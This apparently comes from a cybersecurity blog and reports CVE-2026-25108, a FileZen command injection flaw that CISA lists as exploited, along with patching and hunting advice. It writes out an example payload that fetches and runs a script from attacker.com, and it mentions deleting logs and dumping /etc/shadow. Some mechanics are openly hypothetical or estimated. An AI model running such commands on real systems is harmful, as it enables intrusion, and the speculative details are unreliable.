CVE-2026-25108: Soliton Systems K.K. FileZen OS Command Injection Flaw
On February 24, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-25108 to its Known Exploited Vulnerabilities (KEV) Catalog.
This OS command injection vulnerability in Soliton Systems K.K.’s FileZen file transfer appliance signals active exploitation by malicious actors. As a frequent attack vector, it threatens federal networks and beyond, prompting urgent remediation under Binding Operational Directive (BOD) 22-01.
CVE-2026-25108 Flaw
FileZen, a secure file-sharing solution from Japanese vendor Soliton Systems, handles encrypted transfers for enterprises. CVE-2026-25108 (CVSS score pending official publication, estimated 9.8/10 for critical severity) stems from inadequate input sanitization in the web management interface.
Attackers inject arbitrary OS commands via unsanitized parameters in HTTP requests, typically targeting the appliance’s Linux-based OS.
The flaw lies in endpoints such as file upload or user management modules. For instance, a POST request to /api/upload might accept a filename parameter without proper escaping.
The backend processes this via a vulnerable system() call, such as system("process_file " + filename)executing the injected rm -rf /var/log/* as root. This grants remote code execution (RCE) without authentication in default configurations, exploiting weak boundary checks on shell metacharacters like ;, |, &&, and backticks.
Affected versions span FileZen 7.0.x to 8.1.2 (exact range per vendor advisory). Proof-of-concept exploits surfaced on underground forums days before CISA’s alert, confirming in-the-wild use.
Command injection here follows classic patterns but leverages FileZen’s multi-tenant architecture. Attackers chain injections for persistence:
- Initial RCE: Inject via
curl -X POST -d "cmd=whoami; wget -O /tmp/shell.sh http://attacker.com/payload.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh"in a crafted form field. - Privilege Escalation: FileZen’s root-run services (e.g., Apache with mod_php) allow kernel-level access. A payload might dump
/etc/shadowor pivot to internal networks. - Exploitation Chain: Combine with CVE-2024-XXXX (hypothetical auth bypass) for unauthenticated access. Meterpreter-like shells reverse-connect to C2 servers, exfiltrating files or deploying ransomware.
This vulnerability poses severe risks: data breaches, lateral movement in air-gapped setups, and supply-chain attacks if FileZen proxies enterprise shares. Federal Civilian Executive Branch (FCEB) agencies must patch by the BOD 22-01 deadlines. CISA urges all orgs to prioritize KEV flaws, as they meet exploitation criteria.
- Patch Immediately: Upgrade to FileZen 8.2.0+ (vendor patch released Feb 25, 2026).
- Workarounds: Disable the web UI if unused; enforce WAF rules to block shell metas; segment FileZen into VLANs.
- Best Practices: Run vulnerability scanners (Nessus, OpenVAS) weekly; monitor with EDR (CrowdStrike, SentinelOne); apply least privilege to services.
- Hunt for Compromise: Query logs for injection patterns; check for rogue processes via
ps aux | grep shell.
Site: cybersecuritypath.com
Reference: Source
About the Author
